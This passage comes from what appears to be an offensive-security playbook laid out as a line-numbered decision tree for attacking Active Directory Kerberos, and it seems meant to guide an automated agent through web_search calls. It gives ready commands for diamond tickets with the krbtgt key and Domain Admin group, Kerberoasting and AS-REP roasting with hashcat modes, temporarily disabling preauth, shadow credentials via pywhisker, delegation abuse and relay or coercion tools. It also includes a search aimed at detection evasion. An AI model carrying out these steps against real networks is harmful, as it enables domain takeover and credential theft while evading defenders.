│ │ Rubeus.exe diamond /krbkey:KRBTGT_AES /ticketuser:admin /groups:512
|
|
230
|
-
│ │ web_search("diamond ticket attack rubeus detection evasion")
|
|
231
|
-
│ │
|
|
232
|
-
│ └── Sapphire Ticket: request real TGT for non-existent user, inject legit PAC
|
|
233
|
-
│ web_search("sapphire ticket attack kerberos 2024")
|
|
234
|
-
│
|
|
235
|
-
├── Roasting
|
|
236
|
-
│ ├── Kerberoasting: SPN accounts → request TGS → crack offline
|
|
237
|
-
│ │ Priority targets: service accounts (svc_*, sql, http, MSSQLSvc)
|
|
238
|
-
│ │ hashcat -m 13100 (RC4) or -m 19600 (AES256) → try common service passwords
|
|
239
|
-
│ │
|
|
240
|
-
│ ├── AS-REP Roasting: no preauth required → roast without creds
|
|
241
|
-
│ │ Enumerate: Get-ADUser -Filter * -Properties DoesNotRequirePreAuth
|
|
242
|
-
│ │
|
|
243
|
-
│ └── Targeted Roasting: if you have GenericWrite → disable preauth temporarily
|
|
244
|
-
│ Set-ADAccountControl user -DoesNotRequirePreAuth $true → roast → restore
|
|
245
|
-
│
|
|
246
|
-
├── Delegation Abuse (Constrained/Unconstrained/RBCD)
|
|
247
|
-
│ ├── Tools: findDelegation.py, PowerView Get-DomainComputer -TrustedToAuth
|
|
248
|
-
│ ├── S4U2Self + S4U2Proxy: impersonate any user to target service
|
|
249
|
-
│ └── RBCD: write msDS-AllowedToActOnBehalfOfOtherIdentity → arbitrary impersonation
|
|
250
|
-
│
|
|
251
|
-
├── pkinit / Certificate-Based Auth
|
|
252
|
-
│ ├── Got ADCS cert? → certipy auth → TGT + NT hash WITHOUT password
|
|
253
|
-
│ └── Shadow Credentials: msDS-KeyCredentialLink → certificate auth for target account
|
|
254
|
-
│ pywhisker -t TARGET -a add --domain DOMAIN --dc-ip DC -u user -p pass
|
|
255
|
-
│
|
|
256
|
-
└── Kerberos Relay / Coercion
|
|
257
|
-
├── krbrelayx: relay Kerberos auth (unconstrained delegation hosts)
|
|
258
|
-
├── PetitPotam / DFSCoerce / PrinterBug / MS-RPRN → coerce DC auth
|
|
259
|
-
├── RemotePotato0 / RemotePotato (local → cross-session relay)
|
|
260
|
-
└── web_search("kerberos relay attack {year} {coercion_method}")
|
|
261
|
-
```
|